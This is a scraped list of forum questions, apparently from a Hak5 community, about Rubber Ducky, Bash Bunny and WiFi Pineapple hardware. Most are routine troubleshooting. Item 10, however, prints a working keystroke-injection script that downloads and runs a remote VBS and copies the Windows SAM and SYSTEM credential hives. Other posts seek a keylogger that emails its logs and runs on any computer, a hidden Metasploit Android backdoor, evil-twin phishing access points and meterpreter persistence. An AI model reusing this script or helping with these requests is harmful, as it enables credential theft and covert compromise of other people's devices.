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  1. Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?
  2. Hi guys, I have a problem: I want to hack my Wifi but all the attacks which I found only worked for WPS 1.0 but not on my WPS 2.0. Of course I am open minded for other ways to hack my wifi but none of the attacks which I found worked.🙄😞
  3. Hello guys,im currently learning wpa2 hacking.Actually,i'm using social engineering w/ fake ap(linset,fluxion,airset and etc) and i havea few questions.. 1)Is there any way to hide the real Ap during the deauth spam to make the atack realer and convincing? 2)Can i modify the fake ap with wpa2 encryption to make more real and legitim?With handshake,maybe i can control the password if the victim put wrong... Im using kali and i have 3 wifi adpt btw...
  4. Hey everyone, does anybody know, if i can use this usb-wifi as a third radio for my Nano? => https://www.amazon.de/AVM-FRITZ-WLAN-Stick-Mbit/dp/B000X27VAW
  5. fan


    What is the future wifi pineapple with the appearance of encryption wpa3?
  6. I have a keylogger set to email logs to me on a USB drive, and a BadUSB that can run it on my home computer by navigating to the directory and opening it. However, because drive letters change from computer to computer, is there a way to make the script consistent? The drive letter on my computer is V, but obviously on other computers it could be anything. The BadUSB script opens the file through explorer by typing the drive letter, and I would like it to work on any computer, and not require admin access.
  7. Im trying to encode a script, i have put the jar and the script in the same folder. Here is the command im running Java -jar duckencoder.jar -i Code.txt -o Script.txt -l no I get this back "Error with input file! Exception in thread "main" java.lang.NullPointerException at Encoder.main(Encoder.java:125)" What am i doing wrong?
  8. Hi, I was looking at the USB Rubber Ducky and I noticed it had the optional decal. Is anyone able to tell me the dimensions for the USB decal because I wanted to custom print one with another logo. Thanks, CookieCoder
  9. whenever i run a payload that has a string with the '@' symbol, it writes ' " ' instead.... any way around this???
  10. Hey everyone. I have a question. I am looking at the SAM File Grabber on a live system script and I cant seem to get it to work. I plug it in and the screen just goes crazy and then it doesnt copy anything over. Here is the script I am using. REM Modifications by overwraith ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 REM THE NEXT LINE IS WHERE CHANGING THE DIRECTORY REM TO DESIRED DIRECTORY WOULD HAVE GONE. REM CHANGE DIRECTORY 'DUCKY' FLASH DRIVE. STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER DELAY 800 STRING cd %DUCKYdrive% DELAY 400 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://xxxxxxxxxxxxxxx/xxx/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above. I changed STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . to STRING copy \\DUCKY\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . Also the following: STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . to STRING copy \\DUCKY\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . Ducky is the name of the MicroSD Card so would that be correct? I changed STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs to a vbs script provided by LanMaster53 github account. https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs and changed the URL to my site hosting it. What am I missing. It doesnt seem to work or dump any files back on the Rubber Duck. I am running the Twin Duck Firmware.
  11. Hi, Last night I posted a 'How To' thread under the Hacks/Mods category. Today I decided to write a bash script to automate the process. While I was going through the thread I wrote, I noticed that there are some typos. I would like to edit the thread but there seems to be no option to do so. I understand that as I'm a newbie to Hak5 forums, my account editing privileges are revoked until I post 5 times, but I'm not sure if this is affecting the ability to edit a thread. If anyone could clarify this issue or an admin allow me to edit the thread, that would be awesome! Thanks
  12. So i flashed the latest bunny firmware and now when i try to copy responder to the tools folder it disappears once i plug it out and back in... is there a specific way to do it or does my bunny have a problem? P.S. This is my first Hak5 product i love all the tools including this one. Thanks!
  13. Hi guys I I just bought you is be rubber ducky and I have a Arabic computer and I can't run any kind off script I was questioning if there was a script to change the language of the device using ALT button and shift button to switch to English and run the script sorry for my bad English
  14. So I was testing out the 15 second rubber ducky attack and i'm not to sure how I should be doing the webserver nor what i'm doing wrong. I am very new to hacking and specially webservers, so please don't be too rough on me. So what I have done so far is just dump everything into the apache server, as I expected I didn't get the output file. Just let me know how stupid I am and where I went wrong. This is the webserver right now: http://imgur.com/5NKP0es http://imgur.com/miCNdsr http://imgur.com/Sa1Ish6 http://imgur.com/VWJqkJZ
  15. So i tried to use this command, but my computer says that 'java' is not recognized as a command java -jar encoder.jar -i source.txt
  16. http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip Im following the tutorial on flashing my duck, and every tutorial is telling me to download the folder over. Im getting an error saying; SVN hosting has been permanently disabled. Any help?
  17. When you plug in the Lan Turtle does it interact with the computer itself outside of ethernet? Sorry if its a dumb question i don't have a lan turtel yet.
  18. Hello All, I am trying to install the dependencies for EP2, but they never install. I saw another post where a person said they facory reset their device and this fixed the issue, but this did not work for me. Inside the "Server Maintenance" thread I didn't see that this repo should be down. Anyone else having issues or am I just SOL? Thanks,
  19. Sorry if this is a noob question. I recently attended a training where to presenter used what I assume was a wifi pineapple to scan for the mobile identifiers of phones in the room. Once identified, he could pull up a list of that devices recently connected SSIDs. I also saw a demo in the TED talk linked below. The section starts at about 12:50 for reference. How was this done? I've been experimenting with the Recon AP & Client, but I'm not finding anything similar to what I saw. Any ideas? https://www.ted.com/talks/james_lyne_ev … anguage=en
  20. Is there a script out there, or the possibility to create one that takes a Metasploit Android backdoor from the Rubber Ducky storage, installing, running, and hiding the app afterwards? (Also ensuring that installation from unknown sources is enabled). Any help is appreciated.
  21. So, I did a scan of an area and there were maybe 20 "normal" looking SSIDs and then about an hour later I rescanned and then there were about 20 additional SSIDs that looked like "etw4t7804usehrbnfehjwiou" and "**R*IOR)*%$*Jjklfgjklf". Like someone had somehow introduced 20 new SSIDs that were produced by someone just mashing their fist into the keyboard. Any idea what is up with that?
  22. Hi, I recently got a USB rubber ducky, but I'm stuck as to how to use it. I tried a hello world script but nothing showed up on the screen. I have an Asus c200 Chromebook,and tested it on that, and a windows 8 laptop. Both with now results. I just received this yesterday, and haven't had too much time to play with it (like 30 mins.) As I see it, the led blinks like its supposed to, but no result.
  23. Hi :). I am new in this forum. I have a question. If i build a meterpreter payload and listen to it and someone open it so meterpreter shell open ,and it ok But if someone open it when i am not listening to it and he shutdown his Machine so what now it lose ? There are way to make the meterpreter payload start after shutdown the muchin without a Command ?
  24. First i want to mention that I'm a Huge fan for years! So what i want to ask actually is that i have made my own web shop and trying to sell some Pentesting equipment and guides around it on how to use it, and how to do some basic pentests but since it's somehow hacker related i can not so easy to do on advertising. Cause i heard from a friend that google somehow ranks that kinda traffic lower than other good websites. Like the Hak5 webshop is almost like all the time on the top here (From Belgium) if I search google for hakshop the Hak5 webshop is on the first place and even if i search hackshop so with "CK" the Hak5 webshop is on the 3th place. But i dont have allot off money to put in advertising cause google ad's cost really way to much for me to invest in. So since i dont have money to put in advertising and made a guide on how to make your own USB Rubber Ducky using a normal USB Stick (BADUSB) my question is if that i can make a post about it on the Hak5 forum under the USB Rubber Ducky section? I really don't want to be cooperative against the Hakshop so now also another question is if it's okey for the Hak5 team that i made this post on my webshop and used the USB Rubber Ducky Encoder and the name in my title? Again huge fan off the show for years now so not offended if u tell me i cannot, but i thought that i maybe should ask it first So that i don't get in trouble. Thanks in Advance Develectron
  25. Hello, I am new the usb ducky and creating files. I'm trying to run this command... java -jar duckencoder.jar -i example_1.txt -o inject.bin but it's saying that Could not find or load main class -jar. I am using a Mac, instead of linux or windows, I'm not sure if that makes a difference? Any help would be greatly appreciated.
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